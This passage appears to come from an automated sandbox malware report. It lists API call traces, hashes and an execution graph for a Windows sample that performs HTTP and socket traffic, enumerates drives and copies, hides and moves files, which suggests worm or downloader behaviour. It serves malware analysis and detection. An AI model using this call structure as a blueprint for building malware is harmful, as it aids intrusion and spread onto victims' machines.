                                              • Instruction Fuzzy Hash: DDF03172901428AB9750EEFF84424CBF7E6AF9C368B219176FC18E3260E9709D0546F2
                                              APIs
                                              • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401346
                                              • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401352
                                              • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 0040135C
                                                • Part of subcall function 0040A740: HeapFree.KERNEL32(00520000,00000000,00402612,?,00402612,?), ref: 0040A79B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                              • String ID: pdu
                                              • API String ID: 309973729-2320407122
                                              • Opcode ID: 6b6ea7fc194c066d272c2ceb60e6e8d4b7d6d70c2bd26222ba97c1c57b6b1a03
                                              • Instruction ID: d282b52b3110f6f030980250f42d45aa65f4851f6724e2164e4de9b2c85264d0
                                              • Opcode Fuzzy Hash: 6b6ea7fc194c066d272c2ceb60e6e8d4b7d6d70c2bd26222ba97c1c57b6b1a03
                                              • Instruction Fuzzy Hash: 6101D6765003009BCB20AF51ECC0E9B7779AF48311704467AFD04AB396C738E84187B9
                                              APIs
                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                              • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                              • WSAGetLastError.WS2_32 ref: 00401FB9
                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                              • String ID:
                                              • API String ID: 2074799992-0
                                              • Opcode ID: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                              • Instruction ID: 85cdc4ac02e7a7d961e62fa06f42dc9c3305788cd6d7a2bd32de2e1c20a60a18
                                              • Opcode Fuzzy Hash: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                              • Instruction Fuzzy Hash: DD212F715083159BC200DF55D884D5BB7E8BFCCB54F044A2EF59493291D734EA49CBAA
                                              APIs
                                              • StrChrA.SHLWAPI(00000000,0000007C), ref: 00407326
                                              • DeleteUrlCacheEntry.WININET(00000000), ref: 00407348
                                              • Sleep.KERNEL32(000003E8), ref: 00407361
                                              • DeleteUrlCacheEntry.WININET(?), ref: 00407389
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CacheDeleteEntry$Sleep
                                              • String ID:
                                              • API String ID: 672405725-0
                                              • Opcode ID: e37e67c5e651afdd73fe97e6f1adc621bd3a80b28928a04f69d35c1e57e85d56
                                              • Instruction ID: 2037616d4c8183bc1dcd880db7f677971b3714fceeeaba453b7e7dde7ca31e21
                                              • Opcode Fuzzy Hash: e37e67c5e651afdd73fe97e6f1adc621bd3a80b28928a04f69d35c1e57e85d56
                                              • Instruction Fuzzy Hash: CC217F75E04208FBDB04DFA4D885B9EBB74AF45305F10C1B9ED016B391D679AA80DB49
                                              APIs
                                              • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                              • WSAGetLastError.WS2_32(?,?,?,00401FD3,00000000), ref: 00401C90
                                              • Sleep.KERNEL32(00000001,?,?,?,00401FD3,00000000), ref: 00401CA6
                                              • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                              Yara matches
                                              Similarity
                                              • API ID: Recv$ErrorLastSleep
                                              • String ID:
                                              • API String ID: 3668019968-0
                                              • Opcode ID: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                              • Instruction ID: df3cbe2ca7d05c2b70b960210cdf5b20c1916dde76b22b2cec88194eea221140
                                              • Opcode Fuzzy Hash: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                              • Instruction Fuzzy Hash: 6A11AD72148305AFD310CF65EC84AEBB7ECEB88710F40492AF945D2140E679E94997B6
                                              APIs
                                              • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                              • WSAGetLastError.WS2_32 ref: 00401B12
                                              • Sleep.KERNEL32(00000001), ref: 00401B28
                                              • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                              Yara matches
                                              Similarity
                                              • API ID: Send$ErrorLastSleep
                                              • String ID:
                                              • API String ID: 2121970615-0
                                              • Opcode ID: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                              • Instruction ID: 6027246a5f20d5291fae036152240cd5c1f9414458335baedc5b4335fd2ad738
                                              • Opcode Fuzzy Hash: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                              • Instruction Fuzzy Hash: 8F014F712483046EE7209B96DC88F9B77A8EBC4711F508429F608961C0D7B5A9459B79
                                              APIs
                                              • EnterCriticalSection.KERNEL32(00520634), ref: 0040D9B9
                                              • CloseHandle.KERNEL32(00520638), ref: 0040D9E8
                                              • LeaveCriticalSection.KERNEL32(00520634), ref: 0040D9F7
                                              • DeleteCriticalSection.KERNEL32(00520634), ref: 0040DA04
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                              • String ID:
                                              • API String ID: 3102160386-0
                                              • Opcode ID: ed15acf6120be580f2efb04119f98ac13af0f23ee5fa2c95d393dc01a9c3cf4d
                                              • Instruction ID: da3f5db6e059a7c592b49e611c360a1232ff957d222e4d531544d3c603d0b457
                                              • Opcode Fuzzy Hash: ed15acf6120be580f2efb04119f98ac13af0f23ee5fa2c95d393dc01a9c3cf4d
                                              • Instruction Fuzzy Hash: 2A1121B4E00208EBDB08DF94D984A9DB775FF44309F1081A9E806A7341D739EF95DB85
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                              • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                              • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                              • String ID:
                                              • API String ID: 2223660684-0
                                              • Opcode ID: 03c0a71711caba3423ec18258d7e67e7f1e7096498cee499a2df36c29d80c934
                                              • Instruction ID: 660f416c0ba452cd5c41a421238d9990710d8623252f526507a58679470d43f9
                                              • Opcode Fuzzy Hash: 03c0a71711caba3423ec18258d7e67e7f1e7096498cee499a2df36c29d80c934
                                              • Instruction Fuzzy Hash: 2301F27A242300AFC3209F26ED84A9B73F8AF85B11F00443EE546E3A50DB39E401CB28
                                              APIs
                                                • Part of subcall function 0040E150: memset.NTDLL ref: 0040E178
                                                • Part of subcall function 0040E150: InternetCrackUrlA.WININET(0040DC29,00000000,10000000,0000003C), ref: 0040E1C8
                                                • Part of subcall function 0040E150: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E1D8
                                                • Part of subcall function 0040E150: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E211
                                                • Part of subcall function 0040E150: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E247
                                                • Part of subcall function 0040E150: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E26F
                                                • Part of subcall function 0040E150: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E2B8
                                                • Part of subcall function 0040E150: InternetCloseHandle.WININET(00000000), ref: 0040E347
                                                • Part of subcall function 0040E040: SysAllocString.OLEAUT32(00000000), ref: 0040E06E
                                                • Part of subcall function 0040E040: CoCreateInstance.OLE32(00412A18,00000000,00004401,00412A08,00000000), ref: 0040E096
                                                • Part of subcall function 0040E040: SysFreeString.OLEAUT32(00000000), ref: 0040E131
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040DFEB
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040DFF5
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                              • String ID: %S%S
                                              • API String ID: 1017111014-3267608656
                                              • Opcode ID: 8050ae28274428bf3bfa8973c943a31095365cba4dcb11065546cc064dfc1af3
                                              • Instruction ID: 0d7a9dfb02ef55e8037a527aa51067439edd5703c05fc0bf7ce6e387078fb77b
                                              • Opcode Fuzzy Hash: 8050ae28274428bf3bfa8973c943a31095365cba4dcb11065546cc064dfc1af3
                                              • Instruction Fuzzy Hash: 3E416BB5E002099FCB04DBE5C885AEFB7B4BF88304F108929E505B7391D778AA45CBA1
                                              APIs
                                              • EnterCriticalSection.KERNEL32(004174D8,?,00000000,?), ref: 00405E5F
                                              • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405E9E
                                              • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F13
                                              • LeaveCriticalSection.KERNEL32(004174D8), ref: 00405F30
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSectionmemcpy$EnterLeave
                                              • String ID:
                                              • API String ID: 469056452-0
                                              • Opcode ID: 4996b29259c9349675d46381685df80cb9fbc453c004c8ef9eea7ef5662ad9f1
                                              • Instruction ID: 40e991b6b4618cd04087b2a5cfa683f62b0bf83616b4f0bda180c9645beb9567
                                              • Opcode Fuzzy Hash: 4996b29259c9349675d46381685df80cb9fbc453c004c8ef9eea7ef5662ad9f1
                                              • Instruction Fuzzy Hash: C2218B70904208ABCB04DB94D885BDEBBB5EB94304F1481BAE845672C1C77CAA85CB9A

                                              Execution Graph

Execution Coverage: 0.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 1476
Total number of Limit Nodes: 1
40eef8 4995->5000 4996->4982 4996->4983 5001 40edf1 4997->5001 5002 40ee8c UnmapViewOfFile 4997->5002 4998->4993 4999->5000 5003 40a740 _invalid_parameter 3 API calls 5000->5003 5012 40cd80 5001->5012 5002->4998 5003->4996 5006 40c720 7 API calls 5007 40ee40 5006->5007 5007->5002 5008 40ee5d memcmp 5007->5008 5008->5002 5009 40ee79 5008->5009 5010 40a740 _invalid_parameter 3 API calls 5009->5010 5011 40ee82 5010->5011 5011->5002 5013 40c7b0 10 API calls 5012->5013 5014 40cda4 5013->5014 5014->5002 5014->5006 5016 40dccd htons inet_addr setsockopt 5015->5016 5022 40ddfe 5015->5022 5017 40b010 8 API calls 5016->5017 5018 40dd46 bind lstrlenA sendto ioctlsocket 5017->5018 5019 40dd9b 5018->5019 5023 40ddc2 5019->5023 5024 40a570 9 API calls 5019->5024 5063 40de20 5019->5063 5022->4492 5072 40b0d0 shutdown closesocket 5023->5072 5024->5019 5079 40e150 memset InternetCrackUrlA InternetOpenA 5025->5079 5028 40e02e 5028->4492 5030 40dffb 5031 40a740 _invalid_parameter 3 API calls 5030->5031 5031->5028 5037 40dff1 SysFreeString 5037->5030 5186 40afd0 inet_addr 5040->5186 5043 40b0bd 5048 40ea00 5043->5048 5044 40b06c connect 5045 40b080 getsockname 5044->5045 5046 40b0b4 5044->5046 5045->5046 5189 40b0d0 shutdown closesocket 5046->5189 5190 40afb0 inet_ntoa 5048->5190 5050 40ea16 5051 40cf80 11 API calls 5050->5051 5052 40ea35 5051->5052 5058 40dc5c 5052->5058 5191 40ea80 memset InternetCrackUrlA InternetOpenA 5052->5191 5055 40ea6c 5057 40a740 _invalid_parameter 3 API calls 5055->5057 5056 40a740 _invalid_parameter 3 API calls 5056->5055 5057->5058 5058->4501 5062 40a864 5059->5062 5060 40a86a 5060->4493 5061 40a740 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5061->5062 5062->5060 5062->5061 5064 40de3c 5063->5064 5065 40df04 5064->5065 5066 40de58 recvfrom 5064->5066 5065->5019 5067 40de86 StrCmpNIA 5066->5067 5068 40de79 Sleep 5066->5068 5067->5064 5069 40dea5 StrStrIA 5067->5069 5068->5064 5069->5064 5070 40dec6 StrChrA 5069->5070 5073 40ce30 
5070->5073 5072->5022 5075 40ce3b 5073->5075 5074 40ce41 lstrlenA 5074->5075 5076 40ce54 5074->5076 5075->5074 5075->5076 5077 40a530 _invalid_parameter 7 API calls 5075->5077 5078 40ce70 memcpy 5075->5078 5076->5064 5077->5075 5078->5075 5078->5076 5080 40e1f1 InternetConnectA 5079->5080 5081 40df2a 5079->5081 5082 40e35a InternetCloseHandle 5080->5082 5083 40e22a HttpOpenRequestA 5080->5083 5081->5028 5092 40e040 5081->5092 5082->5081 5084 40e260 HttpSendRequestA 5083->5084 5085 40e34d InternetCloseHandle 5083->5085 5086 40e340 InternetCloseHandle 5084->5086 5089 40e27d 5084->5089 5085->5082 5086->5085 5087 40e2cb 5087->5086 5088 40e29e InternetReadFile 5088->5087 5088->5089 5089->5087 5089->5088 5090 40a570 9 API calls 5089->5090 5091 40e2e6 memcpy 5090->5091 5091->5089 5121 405630 5092->5121 5095 40e06a SysAllocString 5096 40e081 CoCreateInstance 5095->5096 5097 40e137 5095->5097 5099 40e12d SysFreeString 5096->5099 5101 40e0a6 5096->5101 5098 40a740 _invalid_parameter 3 API calls 5097->5098 5100 40df43 5098->5100 5099->5097 5100->5030 5102 40e9b0 5100->5102 5101->5099 5138 40e500 5102->5138 5105 40e380 5143 40e7d0 5105->5143 5110 40e930 6 API calls 5111 40e3d7 5110->5111 5117 40dfc2 5111->5117 5160 40e5f0 5111->5160 5114 40e40f 5114->5117 5165 40e4a0 5114->5165 5115 40e5f0 6 API calls 5115->5114 5117->5037 5118 40cf80 5117->5118 5181 40cef0 5118->5181 5122 40563d 5121->5122 5123 405643 lstrlenA 5122->5123 5125 40a530 _invalid_parameter 7 API calls 5122->5125 5127 405656 5122->5127 5128 40a740 _invalid_parameter 3 API calls 5122->5128 5129 4055d0 5122->5129 5133 405580 5122->5133 5123->5122 5123->5127 5125->5122 5127->5095 5127->5100 5128->5122 5130 4055e7 MultiByteToWideChar 5129->5130 5131 4055da lstrlenA 5129->5131 5132 40560c 5130->5132 5131->5130 5132->5122 5134 40558b 5133->5134 5135 405591 lstrlenA 5134->5135 5136 4055d0 2 API calls 5134->5136 5137 4055c7 5134->5137 5135->5134 5136->5134 5137->5122 5141 40e526 5138->5141 5139 40dfad 5139->5030 5139->5105 
5140 40e5a3 lstrcmpiW 5140->5141 5142 40e5bb SysFreeString 5140->5142 5141->5139 5141->5140 5141->5142 5142->5141 5144 40e7f6 5143->5144 5145 40e39b 5144->5145 5146 40e883 lstrcmpiW 5144->5146 5145->5117 5155 40e930 5145->5155 5147 40e903 SysFreeString 5146->5147 5148 40e896 5146->5148 5147->5145 5149 40e4a0 2 API calls 5148->5149 5151 40e8a4 5149->5151 5150 40e8f5 5150->5147 5151->5147 5151->5150 5152 40e8d3 lstrcmpiW 5151->5152 5153 40e8e5 5152->5153 5154 40e8eb SysFreeString 5152->5154 5153->5154 5154->5150 5156 40e4a0 2 API calls 5155->5156 5158 40e94b 5156->5158 5157 40e3b9 5157->5110 5157->5117 5158->5157 5159 40e7d0 6 API calls 5158->5159 5159->5157 5161 40e4a0 2 API calls 5160->5161 5163 40e60b 5161->5163 5162 40e3f5 5162->5114 5162->5115 5163->5162 5169 40e670 5163->5169 5166 40e4c6 5165->5166 5167 40e4dd 5166->5167 5168 40e500 2 API calls 5166->5168 5167->5117 5168->5167 5170 40e696 5169->5170 5171 40e7ad 5170->5171 5172 40e723 lstrcmpiW 5170->5172 5171->5162 5173 40e7a3 SysFreeString 5172->5173 5174 40e736 5172->5174 5173->5171 5175 40e4a0 2 API calls 5174->5175 5177 40e744 5175->5177 5176 40e795 5176->5173 5177->5173 5177->5176 5178 40e773 lstrcmpiW 5177->5178 5179 40e785 5178->5179 5180 40e78b SysFreeString 5178->5180 5179->5180 5180->5176 5185 40cefd 5181->5185 5182 40cea0 _vscprintf wvsprintfA 5182->5185 5183 40cf18 SysFreeString 5183->5037 5184 40a570 9 API calls 5184->5185 5185->5182 5185->5183 5185->5184 5187 40affc socket 5186->5187 5188 40afe9 gethostbyname 5186->5188 5187->5043 5187->5044 5188->5187 5189->5043 5190->5050 5192 40ea57 5191->5192 5193 40eb24 InternetConnectA 5191->5193 5192->5055 5192->5056 5194 40eca4 InternetCloseHandle 5193->5194 5195 40eb5d HttpOpenRequestA 5193->5195 5194->5192 5196 40eb93 HttpAddRequestHeadersA HttpSendRequestA 5195->5196 5197 40ec97 InternetCloseHandle 5195->5197 5198 40ec8a InternetCloseHandle 5196->5198 5201 40ebdd 5196->5201 5197->5194 5198->5197 5199 40ebf4 InternetReadFile 5200 40ec21 5199->5200 
5199->5201 5200->5198 5201->5199 5201->5200 5202 40a570 9 API calls 5201->5202 5203 40ec3c memcpy 5202->5203 5203->5201 5209 406ff7 5204->5209 5205 4071cb 5207 4071d4 SysFreeString 5205->5207 5208 406f9b SysFreeString 5205->5208 5206 40a740 _invalid_parameter 3 API calls 5206->5205 5207->5208 5208->4505 5210 407250 CoCreateInstance 5209->5210 5211 407146 SysAllocString 5209->5211 5212 407012 5209->5212 5210->5209 5211->5209 5211->5212 5212->5205 5212->5206 5214 40c45a 5213->5214 5215 40c45e 5213->5215 5214->4511 5217 40c410 CryptAcquireContextW 5215->5217 5218 40c44b 5217->5218 5219 40c42d CryptGenRandom CryptReleaseContext 5217->5219 5218->5214 5219->5218 5220->4535 5272 40b360 gethostname 5221->5272 5224 40b449 5224->4535 5226 40b45c strcmp 5226->5224 5227 40b471 5226->5227 5276 40afb0 inet_ntoa 5227->5276 5229 40b47f strstr 5230 40b4d0 5229->5230 5231 40b48f 5229->5231 5279 40afb0 inet_ntoa 5230->5279 5277 40afb0 inet_ntoa 5231->5277 5234 40b49d strstr 5234->5224 5238 40b4ad 5234->5238 5235 40b4de strstr 5236 40b4ee 5235->5236 5237 40b52f 5235->5237 5280 40afb0 inet_ntoa 5236->5280 5282 40afb0 inet_ntoa 5237->5282 5278 40afb0 inet_ntoa 5238->5278 5242 40b4fc strstr 5242->5224 5245 40b50c 5242->5245 5243 40b53d strstr 5246 40b54d 5243->5246 5247 40b58e EnterCriticalSection 5243->5247 5244 40b4bb strstr 5244->5224 5244->5230 5281 40afb0 inet_ntoa 5245->5281 5283 40afb0 inet_ntoa 5246->5283 5248 40b5a6 5247->5248 5257 40b5d1 5248->5257 5285 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5248->5285 5251 40b51a strstr 5251->5224 5251->5237 5252 40b55b strstr 5252->5224 5253 40b56b 5252->5253 5284 40afb0 inet_ntoa 5253->5284 5256 40b6ca LeaveCriticalSection 5256->5224 5257->5256 5259 40a320 7 API calls 5257->5259 5258 40b579 strstr 5258->5224 5258->5247 5260 40b615 5259->5260 5260->5256 5286 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5260->5286 5262 40b633 5263 40b660 5262->5263 5264 40b656 Sleep 5262->5264 5266 40b685 5262->5266 5265 40a740 
_invalid_parameter 3 API calls 5263->5265 5264->5262 5265->5266 5266->5256 5287 40b110 5266->5287 5268->4539 5270 40b110 14 API calls 5269->5270 5271 40b103 LeaveCriticalSection 5270->5271 5271->4531 5273 40b387 gethostbyname 5272->5273 5274 40b3a3 5272->5274 5273->5274 5274->5224 5275 40afb0 inet_ntoa 5274->5275 5275->5226 5276->5229 5277->5234 5278->5244 5279->5235 5280->5242 5281->5251 5282->5243 5283->5252 5284->5258 5285->5257 5286->5262 5288 40b124 5287->5288 5295 40b11f 5287->5295 5289 40a530 _invalid_parameter 7 API calls 5288->5289 5290 40b138 5289->5290 5291 40b194 CreateFileW 5290->5291 5290->5295 5292 40b1e3 InterlockedExchange 5291->5292 5293 40b1b7 WriteFile FlushFileBuffers CloseHandle 5291->5293 5294 40a740 _invalid_parameter 3 API calls 5292->5294 5293->5292 5294->5295 5295->5256 5297 40d7ed 5296->5297 5298 40d723 5297->5298 5299 40d811 WaitForSingleObject 5297->5299 5298->4546 5298->4547 5299->5297 5300 40d82c CloseHandle 5299->5300 5300->5297 5306 407407 5301->5306 5302 4074e1 Sleep 5302->5306 5303 40742f Sleep 5303->5306 5304 40745e Sleep wsprintfA DeleteUrlCacheEntry 5331 40efc0 InternetOpenA 5304->5331 5306->5302 5306->5303 5306->5304 5307 40f070 64 API calls 5306->5307 5307->5306 5309 405829 memset GetModuleHandleW 5308->5309 5310 405862 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5309->5310 5310->5310 5311 4058a0 CreateWindowExW 5310->5311 5312 4058cb 5311->5312 5313 4058cd GetMessageA 5311->5313 5314 4058ff ExitThread 5312->5314 5315 4058e1 TranslateMessage DispatchMessageA 5313->5315 5316 4058f7 5313->5316 5315->5313 5316->5309 5316->5314 5338 40ed00 CreateFileW 5317->5338 5319 406b80 5320 406cd8 ExitThread 5319->5320 5322 406cc8 Sleep 5319->5322 5323 406bb9 5319->5323 5341 406340 GetLogicalDrives 5319->5341 5322->5319 5347 406260 5323->5347 5326 406bf0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5327 406c66 wsprintfW 5326->5327 5328 406c7b wsprintfW 5326->5328 5327->5328 5353 406650 _chkstk 5328->5353 5329 
406beb 5332 40efe6 InternetOpenUrlA 5331->5332 5333 40f058 Sleep 5331->5333 5334 40f005 HttpQueryInfoA 5332->5334 5335 40f04e InternetCloseHandle 5332->5335 5333->5306 5336 40f044 InternetCloseHandle 5334->5336 5337 40f02e 5334->5337 5335->5333 5336->5335 5337->5336 5339 40ed48 5338->5339 5340 40ed2f GetFileSize CloseHandle 5338->5340 5339->5319 5340->5339 5344 40636d 5341->5344 5342 4063e6 5342->5319 5343 40637c RegOpenKeyExW 5343->5344 5345 40639e RegQueryValueExW 5343->5345 5344->5342 5344->5343 5346 4063da RegCloseKey 5344->5346 5345->5344 5345->5346 5346->5344 5348 4062b9 5347->5348 5349 40627c 5347->5349 5348->5326 5348->5329 5388 4062c0 GetDriveTypeW 5349->5388 5352 4062ab lstrcpyW 5352->5348 5354 406667 5353->5354 5355 40666e 6 API calls 5353->5355 5354->5329 5356 406722 5355->5356 5357 406764 PathFileExistsW 5355->5357 5358 40ed00 3 API calls 5356->5358 5359 406803 PathFileExistsW 5357->5359 5360 406779 SetFileAttributesW DeleteFileW PathFileExistsW 5357->5360 5365 40672e 5358->5365 5363 406814 5359->5363 5364 406859 FindFirstFileW 5359->5364 5361 4067a9 CreateDirectoryW 5360->5361 5362 4067cb PathFileExistsW 5360->5362 5361->5362 5366 4067bc SetFileAttributesW 5361->5366 5362->5359 5367 4067dc CopyFileW 5362->5367 5368 406834 5363->5368 5369 40681c 5363->5369 5364->5354 5386 406880 5364->5386 5365->5357 5370 406745 SetFileAttributesW DeleteFileW 5365->5370 5366->5362 5367->5359 5372 4067f4 SetFileAttributesW 5367->5372 5374 406400 3 API calls 5368->5374 5393 406400 CoInitialize CoCreateInstance 5369->5393 5370->5357 5371 406942 lstrcmpW 5375 406958 lstrcmpW 5371->5375 5371->5386 5372->5359 5376 40682f SetFileAttributesW 5374->5376 5375->5386 5376->5364 5377 406b19 FindNextFileW 5377->5371 5379 406b35 FindClose 5377->5379 5379->5354 5380 40699e lstrcmpiW 5380->5386 5381 406a05 PathMatchSpecW 5383 406a26 wsprintfW SetFileAttributesW DeleteFileW 5381->5383 5381->5386 5382 406a83 PathFileExistsW 5384 406a99 wsprintfW wsprintfW 5382->5384 5382->5386 5383->5386 
5385 406b03 MoveFileExW 5384->5385 5384->5386 5385->5377 5386->5371 5386->5377 5386->5380 5386->5381 5386->5382 5397 406510 CreateDirectoryW wsprintfW FindFirstFileW 5386->5397 5389 40629f 5388->5389 5390 4062e8 5388->5390 5389->5348 5389->5352 5390->5389 5391 4062fc QueryDosDeviceW 5390->5391 5391->5389 5392 406316 StrCmpNW 5391->5392 5392->5389 5394 406436 5393->5394 5396 406472 5393->5396 5395 406440 wsprintfW 5394->5395 5394->5396 5395->5396 5396->5376 5398 406565 lstrcmpW 5397->5398 5399 40663f 5397->5399 5400 40657b lstrcmpW 5398->5400 5404 406591 5398->5404 5399->5386 5401 406593 wsprintfW wsprintfW 5400->5401 5400->5404 5403 4065f6 MoveFileExW 5401->5403 5401->5404 5402 40660c FindNextFileW 5402->5398 5405 406628 FindClose RemoveDirectoryW 5402->5405 5403->5402 5404->5402 5405->5399 5406 40d440 5411 40d444 5406->5411 5408 40d460 WaitForSingleObject 5410 40d485 5408->5410 5408->5411 5411->5408 5411->5410 5412 40b790 EnterCriticalSection 5411->5412 5417 40d060 InterlockedExchangeAdd 5411->5417 5413 40b7c7 LeaveCriticalSection 5412->5413 5414 40b7af 5412->5414 5413->5411 5415 40c450 3 API calls 5414->5415 5416 40b7ba 5415->5416 5416->5413 5418 40d07d 5417->5418 5428 40d076 5417->5428 5434 40d350 5418->5434 5421 40d09d InterlockedIncrement 5431 40d0a7 5421->5431 5423 40d0d0 5444 40afb0 inet_ntoa 5423->5444 5425 40d0dc 5426 40d1a0 InterlockedDecrement 5425->5426 5459 40b0d0 shutdown closesocket 5426->5459 5428->5411 5429 40a530 _invalid_parameter 7 API calls 5429->5431 5430 40d280 6 API calls 5430->5431 5431->5423 5431->5426 5431->5429 5431->5430 5433 40a740 _invalid_parameter 3 API calls 5431->5433 5441 40bab0 5431->5441 5445 40bb00 5431->5445 5433->5431 5435 40d35d socket 5434->5435 5436 40d372 htons connect 5435->5436 5437 40d3cf 5435->5437 5436->5437 5438 40d3ba 5436->5438 5437->5435 5439 40d08d 5437->5439 5460 40b0d0 shutdown closesocket 5438->5460 5439->5421 5439->5428 5461 40ba10 5441->5461 5444->5425 5455 40bb11 5445->5455 5447 40bb2f 5449 40a740 
_invalid_parameter 3 API calls 5447->5449 5450 40bedf 5449->5450 5450->5431 5451 40bef0 21 API calls 5451->5455 5454 40bab0 13 API calls 5454->5455 5455->5447 5455->5451 5455->5454 5456 40b410 32 API calls 5455->5456 5469 40c040 5455->5469 5476 40b7e0 EnterCriticalSection 5455->5476 5481 406e20 5455->5481 5486 406ec0 5455->5486 5491 406cf0 5455->5491 5498 406df0 5455->5498 5456->5455 5459->5428 5460->5439 5462 40c490 3 API calls 5461->5462 5463 40ba1b 5462->5463 5464 40ba37 lstrlenA 5463->5464 5465 40c720 7 API calls 5464->5465 5466 40ba6d 5465->5466 5467 40ba98 5466->5467 5468 40a740 _invalid_parameter 3 API calls 5466->5468 5467->5431 5468->5467 5470 40c051 lstrlenA 5469->5470 5471 40c720 7 API calls 5470->5471 5475 40c06f 5471->5475 5472 40c07b 5473 40c0ff 5472->5473 5474 40a740 _invalid_parameter 3 API calls 5472->5474 5473->5455 5474->5473 5475->5470 5475->5472 5479 40b7f8 5476->5479 5477 40b834 LeaveCriticalSection 5477->5455 5479->5477 5501 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5479->5501 5480 40b823 5480->5477 5502 406e60 5481->5502 5484 406e59 5484->5455 5485 40d6f0 17 API calls 5485->5484 5487 406e60 75 API calls 5486->5487 5488 406edf 5487->5488 5489 406f0c 5488->5489 5517 406f20 5488->5517 5489->5455 5520 405f40 EnterCriticalSection 5491->5520 5493 406d0a 5494 406d3d 5493->5494 5525 406d50 5493->5525 5494->5455 5497 40a740 _invalid_parameter 3 API calls 5497->5494 5532 406000 EnterCriticalSection 5498->5532 5500 406e12 5500->5455 5501->5480 5505 406e73 5502->5505 5503 406e34 5503->5484 5503->5485 5505->5503 5506 405e50 EnterCriticalSection 5505->5506 5507 